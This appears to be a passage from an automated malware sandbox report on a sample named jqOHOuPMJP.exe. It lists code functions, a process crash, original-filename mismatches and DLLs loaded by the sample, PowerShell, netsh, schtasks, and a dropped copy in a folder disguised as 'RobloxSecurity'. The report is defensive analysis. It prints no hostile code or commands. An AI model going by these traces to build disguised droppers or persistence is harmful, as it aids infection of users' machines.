Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 11_2_00007FFD9B972B4C	11_2_00007FFD9B972B4C
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 11_2_00007FFD9B989762	11_2_00007FFD9B989762
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 11_2_00007FFD9B987B8D	11_2_00007FFD9B987B8D
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 11_2_00007FFD9B977D15	11_2_00007FFD9B977D15
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 18_2_00007FFD9B978B08	18_2_00007FFD9B978B08
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 18_2_00007FFD9B9882EA	18_2_00007FFD9B9882EA
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 18_2_00007FFD9B972B4C	18_2_00007FFD9B972B4C
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 18_2_00007FFD9B989742	18_2_00007FFD9B989742
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 18_2_00007FFD9B987B6D	18_2_00007FFD9B987B6D
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 18_2_00007FFD9B977D59	18_2_00007FFD9B977D59
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 42_2_00007FFD9B982B4C	42_2_00007FFD9B982B4C
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 42_2_00007FFD9B9806D1	42_2_00007FFD9B9806D1
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 42_2_00007FFD9B987D59	42_2_00007FFD9B987D59
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 44_2_00007FFD9B962B4C	44_2_00007FFD9B962B4C
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 44_2_00007FFD9B967D59	44_2_00007FFD9B967D59
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 45_2_00007FFD9B992B4C	45_2_00007FFD9B992B4C
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Code function: 45_2_00007FFD9B9978F5	45_2_00007FFD9B9978F5

One or more processes crash

Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 8072 -s 1632

Sample file is different than original file name gathered from version info

Source: jqOHOuPMJP.exe, 00000000.00000002.1796380426.0000000000CF7000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs jqOHOuPMJP.exe
Source: jqOHOuPMJP.exe, 00000000.00000002.1797186606.0000000000F1E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs jqOHOuPMJP.exe
Source: jqOHOuPMJP.exe, 00000000.00000000.1644125840.0000000000946000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameLaps.exe4 vs jqOHOuPMJP.exe
Source: jqOHOuPMJP.exe, 00000000.00000002.1817862177.0000000003DAA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameHab9b84cf0be099b26b5d8bd8efac02917c.exeT vs jqOHOuPMJP.exe
Source: jqOHOuPMJP.exe	Binary or memory string: OriginalFilenameLaps.exe4 vs jqOHOuPMJP.exe

Tries to load missing DLLs

Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\jqOHOuPMJP.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: httpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Section loaded: ucrtbase_clr0400.dll
